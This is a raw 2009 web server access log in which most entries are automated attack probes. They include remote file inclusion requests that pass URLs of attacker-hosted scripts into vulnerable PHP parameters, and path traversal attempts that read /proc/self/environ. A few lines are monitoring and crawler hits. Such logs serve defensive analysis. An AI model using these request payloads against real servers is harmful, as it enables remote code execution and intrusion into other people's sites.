203.84.238.7 - - [20/Jul/2009:04:43:29 -0400] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.x-pronet.com/board/test.txt?? HTTP/1.1" 404 251 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
200.234.200.154 - - [20/Jul/2009:04:45:44 -0400] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 266 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
200.234.200.154 - - [20/Jul/2009:04:45:44 -0400] "GET /logs/error_log.Q109061000//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 292 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
200.234.200.154 - - [20/Jul/2009:04:45:44 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
200.234.200.154 - - [20/Jul/2009:04:45:44 -0400] "GET /logs/error_log.Q109061000/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 234 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
200.234.200.154 - - [20/Jul/2009:04:45:44 -0400] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 266 "-" "XXXXXX"
200.234.200.154 - - [20/Jul/2009:04:45:44 -0400] "GET /logs/error_log.Q109061000//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 292 "-" "XXXXXX"
200.234.200.154 - - [20/Jul/2009:04:45:45 -0400] "GET //administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 266 "-" "XXXXXX"
200.234.200.154 - - [20/Jul/2009:04:45:45 -0400] "GET /logs/error_log.Q109061000//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 292 "-" "XXXXXX"
200.234.200.154 - - [20/Jul/2009:04:45:57 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 271 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
200.234.200.154 - - [20/Jul/2009:04:45:58 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
200.234.200.154 - - [20/Jul/2009:04:45:58 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 271 "-" "XXXXXX"
200.234.200.154 - - [20/Jul/2009:04:45:59 -0400] "GET /logs//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 271 "-" "XXXXXX"
209.59.12.99 - - [20/Jul/2009:04:46:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.234.200.154 - - [20/Jul/2009:04:46:24 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 293 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
200.234.200.154 - - [20/Jul/2009:04:46:25 -0400] "GET /logs/access_log.Q109061800/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox"
200.234.200.154 - - [20/Jul/2009:04:46:25 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 293 "-" "XXXXXX"
200.234.200.154 - - [20/Jul/2009:04:46:26 -0400] "GET /logs/access_log.Q109061800//administrator/components/com_chronocontact/excelwriter/PPS/File.php?mosConfig_absolute_path=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-" "XXXXXX"
222.236.44.96 - - [20/Jul/2009:04:47:23 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 227 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
222.236.44.96 - - [20/Jul/2009:04:47:23 -0400] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
222.236.44.96 - - [20/Jul/2009:04:47:23 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
222.236.44.96 - - [20/Jul/2009:04:47:23 -0400] "GET /logs/access_log.Q109070300/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
222.236.44.96 - - [20/Jul/2009:04:47:23 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 232 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
222.236.44.96 - - [20/Jul/2009:04:47:24 -0400] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 254 "-" "XXXXXX"
222.236.44.96 - - [20/Jul/2009:04:47:24 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 227 "-" "XXXXXX"
222.236.44.96 - - [20/Jul/2009:04:47:24 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
222.236.44.96 - - [20/Jul/2009:04:47:24 -0400] "GET /logs/access_log.Q109070300//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 254 "-" "XXXXXX"
222.236.44.96 - - [20/Jul/2009:04:47:24 -0400] "GET //modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 227 "-" "XXXXXX"
222.236.44.96 - - [20/Jul/2009:04:47:26 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 232 "-" "XXXXXX"
222.236.44.96 - - [20/Jul/2009:04:47:26 -0400] "GET /logs//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 232 "-" "XXXXXX"
222.236.44.96 - - [20/Jul/2009:04:48:08 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 254 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6"
222.236.44.96 - - [20/Jul/2009:04:48:08 -0400] "GET /logs/access_log.Q109051000/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
222.236.44.96 - - [20/Jul/2009:04:48:09 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 254 "-" "XXXXXX"
222.236.44.96 - - [20/Jul/2009:04:48:10 -0400] "GET /logs/access_log.Q109051000//modules/vwar/admin/admin.php?vwar_root=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 254 "-" "XXXXXX"
207.182.131.74 - - [20/Jul/2009:04:48:25 -0400] "GET /logs/access_log.Q109051800%20%20/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
207.182.131.74 - - [20/Jul/2009:04:48:25 -0400] "GET /logs/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
207.182.131.74 - - [20/Jul/2009:04:48:25 -0400] "GET /components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
207.182.131.74 - - [20/Jul/2009:04:48:36 -0400] "GET /logs/access_log.Q109052700%20%20/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 269 "-" "Mozilla/5.0"
201.232.54.48 - - [20/Jul/2009:04:49:27 -0400] "GET /config.php?base_dir=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 208 "-" "libwww-perl/5.805"
212.193.229.157 - - [20/Jul/2009:04:50:48 -0400] "GET /logs/error_log.Q109051800/config.php?base_dir=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 234 "-" "libwww-perl/5.805"
209.59.12.99 - - [20/Jul/2009:04:51:24 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
66.249.68.247 - - [20/Jul/2009:04:52:18 -0400] "GET /images/home_connect_over.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
87.242.98.70 - - [20/Jul/2009:04:52:57 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:04:52:57 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:04:52:57 -0400] "GET /logs/access_log.Q109051200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:04:53:28 -0400] "GET /logs/access_log.Q109051200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:04:53:46 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
203.84.238.7 - - [20/Jul/2009:04:53:58 -0400] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://www.x-pronet.com/board/test.txt?? HTTP/1.1" 404 246 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
203.84.238.7 - - [20/Jul/2009:04:53:58 -0400] "GET /logs/components/com_facileforms/facileforms.frame.php?ff_compath=http://www.x-pronet.com/board/test.txt?? HTTP/1.1" 404 251 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)"
216.93.186.188 - - [20/Jul/2009:04:54:12 -0400] "GET //?path%5Bdocroot%5D=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:04:54:12 -0400] "GET /logs/access_log.Q109063000%20%20//?path%5Bdocroot%5D=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:04:54:12 -0400] "GET /logs//?path%5Bdocroot%5D=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 200 10267 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:04:54:12 -0400] "GET /logs/access_log.Q109053100%20%20//?path%5Bdocroot%5D=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
207.182.131.74 - - [20/Jul/2009:04:54:13 -0400] "GET /logs/access_log.Q109052700/components/com_simpleboard/file_upload.php?sbp=http://www.die-grenzreiter.com/content/download/fx29id.txt?? HTTP/1.1" 404 267 "-" "Mozilla/5.0"
200.234.200.230 - - [20/Jul/2009:04:55:38 -0400] "GET /logs/access_log.Q109062900//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 272 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:04:55:38 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 245 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:04:55:38 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 250 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:04:55:38 -0400] "GET /logs/access_log.Q109062900//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 272 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:04:55:38 -0400] "GET /logs//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 250 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:04:55:38 -0400] "GET //modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 245 "-" "XXXXXX"
209.59.12.99 - - [20/Jul/2009:04:56:23 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.234.200.230 - - [20/Jul/2009:04:56:32 -0400] "GET /logs/access_log.Q109052100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 272 "-" "XXXXXX"
200.234.200.230 - - [20/Jul/2009:04:56:32 -0400] "GET /logs/access_log.Q109052100//modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 272 "-" "XXXXXX"
123.242.165.138 - - [20/Jul/2009:04:56:33 -0400] "GET /bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:04:56:33 -0400] "GET /logs/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:04:56:33 -0400] "GET /logs/access_log.Q109061200/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:04:56:33 -0400] "GET /logs/access_log.Q109070100/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:04:56:57 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:04:56:57 -0400] "GET /logs/access_log.Q109051200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:04:56:57 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:04:56:59 -0400] "GET //components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:04:56:59 -0400] "GET /logs//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:04:56:59 -0400] "GET /logs/access_log.Q109051200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:04:57:46 -0400] "GET /logs/access_log.Q109051200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:04:57:47 -0400] "GET /logs/access_log.Q109051200%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
118.129.166.10 - - [20/Jul/2009:04:57:54 -0400] "GET /logs/access_log.Q109052600//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
118.129.166.10 - - [20/Jul/2009:04:57:55 -0400] "GET /logs/access_log.Q109062500//includes/tar_lib/pcltar.lib.php?g_pcltar_lib_dir=http://www.bu.ac.th/statistic/fileupload/baner.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:04:58:03 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:04:58:08 -0400] "GET /logs/access_log.Q109051500%20%20//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
72.32.125.181 - - [20/Jul/2009:04:59:30 -0400] "GET /logs/access_log.Q109061800/?_SERVER[DOCUMENT_ROOT]=http://www.cityfit.ru/stat/dtc.txt?? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
72.32.125.181 - - [20/Jul/2009:04:59:30 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.cityfit.ru/stat/dtc.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
72.32.125.181 - - [20/Jul/2009:04:59:30 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.cityfit.ru/stat/dtc.txt?? HTTP/1.1" 200 10262 "-" "libwww-perl/5.79"
216.93.186.188 - - [20/Jul/2009:04:59:35 -0400] "GET /logs/access_log.Q109053100//?path%5Bdocroot%5D=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
216.93.186.188 - - [20/Jul/2009:04:59:35 -0400] "GET /logs/access_log.Q109063000//?path%5Bdocroot%5D=http://0wnzz.by.ru/id1.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
87.242.98.70 - - [20/Jul/2009:05:00:02 -0400] "GET /logs/access_log.Q109071200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:05:00:05 -0400] "GET /logs/access_log.Q109061200%20%20/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
123.242.165.138 - - [20/Jul/2009:05:00:10 -0400] "GET /logs/access_log.Q109070100%20%20/bookmark4u/lostpasswd.php?env%5Binclude_prefix%5D=http://www.ebstore.de/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
110.45.145.92 - - [20/Jul/2009:05:00:23 -0400] "GET /logs/access_log.Q109061900//main.php?appserv_root=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
110.45.145.92 - - [20/Jul/2009:05:00:23 -0400] "GET //main.php?appserv_root=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 207 "-" "libwww-perl/5.79"
110.45.145.92 - - [20/Jul/2009:05:00:23 -0400] "GET /logs//main.php?appserv_root=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 212 "-" "libwww-perl/5.79"
124.0.139.129 - - [20/Jul/2009:05:00:39 -0400] "GET /logs/access_log.Q109071200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:05:00:39 -0400] "GET /logs/access_log.Q109071200//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
72.30.78.231 - - [20/Jul/2009:05:00:49 -0400] "GET /logs/access_log.Q109071500 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.200.199.144 - - [20/Jul/2009:05:00:53 -0400] "GET /logs//bbs//skin/ggambo7002_board/write.php?dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
114.200.199.144 - - [20/Jul/2009:05:00:53 -0400] "GET //bbs//skin/ggambo7002_board/write.php?dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
114.200.199.144 - - [20/Jul/2009:05:00:54 -0400] "GET /logs/access_log.Q109071500%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
124.0.139.129 - - [20/Jul/2009:05:00:56 -0400] "GET /logs/access_log.Q109051500//components/com_cpg/cpg.php?mosConfig_absolute_path=http://www.babycome.ne.jp/report///id1.txt??? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
110.45.145.92 - - [20/Jul/2009:05:01:12 -0400] "GET /logs/access_log.Q109060100//main.php?appserv_root=http://fotopasja.info/css/id.txt???? HTTP/1.1" 404 234 "-" "libwww-perl/5.79"
200.234.200.232 - - [20/Jul/2009:05:01:25 -0400] "GET //allopass.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 211 "-" "XXXXXX"
200.234.200.232 - - [20/Jul/2009:05:01:25 -0400] "GET /logs/access_log.Q109061400//allopass.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 238 "-" "XXXXXX"
200.234.200.232 - - [20/Jul/2009:05:01:25 -0400] "GET /logs//allopass.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 216 "-" "XXXXXX"
200.234.200.232 - - [20/Jul/2009:05:01:26 -0400] "GET //allopass.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 211 "-" "XXXXXX"
200.234.200.232 - - [20/Jul/2009:05:01:26 -0400] "GET /logs/access_log.Q109061400//allopass.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 238 "-" "XXXXXX"
200.234.200.232 - - [20/Jul/2009:05:01:26 -0400] "GET /logs//allopass.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 216 "-" "XXXXXX"
146.48.83.133 - - [20/Jul/2009:05:01:36 -0400] "GET //?_zb_path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id.txt? HTTP/1.1" 200 452 "-" "Mozilla/5.0"
146.48.83.133 - - [20/Jul/2009:05:01:36 -0400] "GET /logs/access_log.Q109070400%20%20//?_zb_path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
146.48.83.133 - - [20/Jul/2009:05:01:36 -0400] "GET /logs//?_zb_path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id.txt? HTTP/1.1" 200 10267 "-" "Mozilla/5.0"
146.48.83.133 - - [20/Jul/2009:05:01:47 -0400] "GET /logs/access_log.Q109060600%20%20//?_zb_path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
114.200.199.144 - - [20/Jul/2009:05:01:55 -0400] "GET /logs/access_log.Q109070800%20%20//bbs//skin/ggambo7002_board/write.php?dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 264 "-" "Mozilla/5.0"
209.59.12.99 - - [20/Jul/2009:05:02:04 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.234.200.232 - - [20/Jul/2009:05:02:32 -0400] "GET /logs/error_log.Q109061400//allopass.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 237 "-" "XXXXXX"
200.234.200.232 - - [20/Jul/2009:05:02:32 -0400] "GET /logs/error_log.Q109061400//allopass.php?mosConfig_live_site=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 237 "-" "XXXXXX"
146.48.83.133 - - [20/Jul/2009:05:02:40 -0400] "GET /logs/access_log.Q109060500//?_zb_path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
146.48.83.133 - - [20/Jul/2009:05:02:41 -0400] "GET /logs/access_log.Q109070400//?_zb_path=http://bangalore.ddhanbit.or.kr/bbs/skin/ggambo7002_board/copy/fx29id.txt? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
114.200.199.144 - - [20/Jul/2009:05:03:22 -0400] "GET /logs/access_log.Q109071500//bbs//skin/ggambo7002_board/write.php?dir=http://www.solmae.co.kr///receipt/lib/_private/id1.txt? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
83.149.105.122 - - [20/Jul/2009:05:03:45 -0400] "GET //index.php?str=http://www.jugendheim-lenting.de/karten//components/com_galleria/kontol.txt? HTTP/1.1" 404 208 "-" "libwww-perl/5.811"
